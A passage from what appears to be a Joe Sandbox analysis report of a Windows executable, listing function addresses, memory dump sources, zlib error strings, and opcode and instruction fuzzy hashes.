                                                                                                                                                                                                                                                                                • Instruction ID: 011fa1723de065c0ab7b0c8b1b49d56b80789ec705b0979043ea75d77e4f8b27
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01C10372B1928697EB74DF19A04466AF791FB84B84F84C139DB4E67B84DB3DE801CB40
                                                                                                                                                                                                                                                                                Function 00007FF733399A34 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                                                                                • Opcode ID: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                                                • Instruction ID: 9d198197c043ead6252ed61ca75f2ba4c1c702e44327fb6325e651b408f7023a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F19172A183C5DBE7F5AB19C488B3ABAA9EF44740F46853CDA4D67390CB38E840D750
                                                                                                                                                                                                                                                                                Function 00007FF7333BA998 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                                                                                • Opcode ID: e29282b711dd5704c0e64fe7638cddbeeb7149a3015151b68882fd3146651568
                                                                                                                                                                                                                                                                                • Instruction ID: 7d6ac051009ad33cf3b00950501c25af33dfffd44172bdb0faf1171c7e87b96c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e29282b711dd5704c0e64fe7638cddbeeb7149a3015151b68882fd3146651568
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B17C73A14B898BEB65CF2DC44636CBBA0F784B48F54C829DA5D837A4CB39D451D710
                                                                                                                                                                                                                                                                                Function 00007FF7333A4450 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                                                                                • Opcode ID: 5ebab5a2817f928350dc9776a3da4b540f16bc97e78530f340af468d76ff9f5e
                                                                                                                                                                                                                                                                                • Instruction ID: 93ed30e86ef78cefc4c984a2fb5a56d788b0fff3eb16f89ea5c6153a5845b124
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ebab5a2817f928350dc9776a3da4b540f16bc97e78530f340af468d76ff9f5e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79E1C732A0864691EBF8AF15905013DA3A0FF45B48F94C23DDA6E27794DF3EE891E710
                                                                                                                                                                                                                                                                                Function 00007FF73339989B Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                                                                                • Opcode ID: 8c4c8a6a705a7cf803fa5291bdc529627e531fe0bdcc095ab807ab19af6e2c49
                                                                                                                                                                                                                                                                                • Instruction ID: 8f272ada9bf887c7ba8329d5099751943e4f6e35cfef41efe5227af80d90ab6b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4c8a6a705a7cf803fa5291bdc529627e531fe0bdcc095ab807ab19af6e2c49
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0891A472A182C6DBE7F49B14C488B3ABAA9FF44354F51823DDA4E567D0CB38E940DB10
                                                                                                                                                                                                                                                                                Function 00007FF7333AEFB8 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                                • Opcode ID: ab39e04084c8b9065030c447a5361eb1aff85978d5a2f70618a83e2e92251626
                                                                                                                                                                                                                                                                                • Instruction ID: 36e6a80cc68faf915c41e94eb3a3cbc4020c59dcbe0c4f0ed6ea2b1ac98e3441
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab39e04084c8b9065030c447a5361eb1aff85978d5a2f70618a83e2e92251626
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F516322B182C596E7B0DA35DC00769BB91EB45B94F88C339CABC5BAC5CF3ED4459710
                                                                                                                                                                                                                                                                                Function 00007FF7333AEB24 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                                • Opcode ID: 1e22957b1159dd03df7ccd337d5a67203babfefd7ac1e182ea12ea91d3eef3d6
                                                                                                                                                                                                                                                                                • Instruction ID: 17a6af3f6fff8d8190396a4b52a9736d0cfbc03c9f440f94fb500da919308a8b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e22957b1159dd03df7ccd337d5a67203babfefd7ac1e182ea12ea91d3eef3d6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA17862F0A7C696EBB1DF2590007A9BB90EB50B84F40C135DEAD577A5DE3DE401D710
                                                                                                                                                                                                                                                                                Function 00007FF7333A96D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                                • Opcode ID: 2d09a8d0b3f9f3e3f4726bcb3549591c54293473ccc366ec5b1b4d61c621e7ad
                                                                                                                                                                                                                                                                                • Instruction ID: 1e195b1e1878849fd5321b9cbbc2941e644b54370ca74e4537d5b5d4a3c2e8f4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d09a8d0b3f9f3e3f4726bcb3549591c54293473ccc366ec5b1b4d61c621e7ad
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B51D511B0C24A61FAF4BB27591117AD2946F81BC5FC8C13CED2EB7796EE3DE441A220
                                                                                                                                                                                                                                                                                Function 00007FF7333B46F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                • Opcode ID: b79ea0c05b8e708bf2e7ff1fe6aa0946c24d08db99ce40c7e012d78a6a9acfe9
                                                                                                                                                                                                                                                                                • Instruction ID: 54c195b163823b7a8683ce003cfe6c63965fa12ffcd882e01597cd3b5e41d820
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b79ea0c05b8e708bf2e7ff1fe6aa0946c24d08db99ce40c7e012d78a6a9acfe9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADB09220E17A02D6EA983F516C8222472A47F48710FD4803CC00C61320DE3C21AA6720
                                                                                                                                                                                                                                                                                Function 00007FF7333A3F8C Relevance: .4, Instructions: 374COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: a25825d834791a15779abc5a96815a53d20fd0a8b1de7024d724f2c7a0ffd609
                                                                                                                                                                                                                                                                                • Instruction ID: 15b0bdf042def93c73bb1e412f7c6a194e8db63ef92284325632cae0a94be52c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a25825d834791a15779abc5a96815a53d20fd0a8b1de7024d724f2c7a0ffd609
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08E1A222908242A5E6F8EA25814413DE7A1FF94B44F94C239CE6D277D9DF3DE891F360
                                                                                                                                                                                                                                                                                Function 00007FF7333A3750 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 92f5019cce735186dcbe47a7940729bb5e8d7af8c1d6157f075a5e7b95ae45a8
                                                                                                                                                                                                                                                                                • Instruction ID: f5654a71f58dc08775efa739feb3c194a6575f13409ad8ed1cde0676d5978e54
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92f5019cce735186dcbe47a7940729bb5e8d7af8c1d6157f075a5e7b95ae45a8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21E1E732A0C602A5E7F4AA28C05437CA7A1EB45B64F94C23DCE6D272D5CF3DD845E722
                                                                                                                                                                                                                                                                                Function 00007FF7333A3B88 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 86da56c12cd563bcad921fbd71c05d3fa176844b52d15b5090a52c27ad8a5c54
                                                                                                                                                                                                                                                                                • Instruction ID: 61b54db93ed388153ffec9c72e6b6498195db1b5781896f413d93cc7b85a6c69
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86da56c12cd563bcad921fbd71c05d3fa176844b52d15b5090a52c27ad8a5c54
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BD1EB32A08646A5EBF8AF25844067DB7A0EF05B68F94823DCD2D276D5CF3DD841E351
                                                                                                                                                                                                                                                                                Function 00007FF733398DC0 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 8e0142d1de63ac36c46e431d0d75baaff102e1c1a7ac2c303afc5037c5988706
                                                                                                                                                                                                                                                                                • Instruction ID: 66d9a8e148c170f6d184279cdda45a5552bd0e43c4b208a319b9a0bdd0aa10cb
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e0142d1de63ac36c46e431d0d75baaff102e1c1a7ac2c303afc5037c5988706
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECC1BA726141E18BD299EB29E46A57B73E1F7D8389BC4803ADF8B47B85C63CE014D721
                                                                                                                                                                                                                                                                                Function 00007FF7333A2420 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: b5780ef2d000dcd486574e33efb2770a379a55a34775bc5a7b80e7b31bbd7158
                                                                                                                                                                                                                                                                                • Instruction ID: 01bdd8b8153b28a30b536f2e26500559e02f8bb471ff7b720e8c89eefccc2996
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5780ef2d000dcd486574e33efb2770a379a55a34775bc5a7b80e7b31bbd7158
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B1C27290C64195E7B5AF39C05423CBBB0FB45B48F948139DA5DA7395CF39D860E720
                                                                                                                                                                                                                                                                                Function 00007FF7333A27B8 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                                                • Instruction ID: d0eee84019b860588325e26f02a347e8e31e6fff94912ee7b29716eb7cfca6f5
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4B1817250C64695E7B49F29C05023CBBA0E749F48FA4813DCE5D97395CF39D461E720
                                                                                                                                                                                                                                                                                Function 00007FF7333AF638 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
